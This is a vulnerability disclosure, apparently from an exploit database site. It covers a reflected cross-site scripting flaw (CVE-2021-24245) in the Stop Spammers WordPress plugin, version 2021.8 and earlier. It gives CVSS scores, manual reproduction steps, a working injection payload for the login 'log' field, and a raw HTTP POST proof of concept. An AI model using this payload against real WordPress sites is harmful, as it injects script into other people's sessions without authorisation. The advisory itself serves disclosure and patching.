WordPress Plugin Stop Spammers 2021.8 log Reflected Cross-site Scripting (XSS)

2021.05.23
Credit: Hosein Vita
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS) # Date: 04/08/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/ # Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip # Version: <= 2021.8 # Tested on: Windows-Ubuntu # CVE : CVE-2021-24245 Summary: Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript Proof of concepts: 1-Install "Stop Spammers <= 2021.8" in your wordpress website 2-For testing remove your IP address from the allowed list 3-Go to http://<YOUR-WEBSITE>/wp-admin 4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) " #Notice the `ad` keyword must be in your payload! 5-Press Alt + Shift + X to trigger Xss #Tested on Firefox Request POC: POST /wp-login.php HTTP/1.1 Host: localhost Connection: close Content-Length: 161 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_test_cookie=WP+Cookie+check; log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top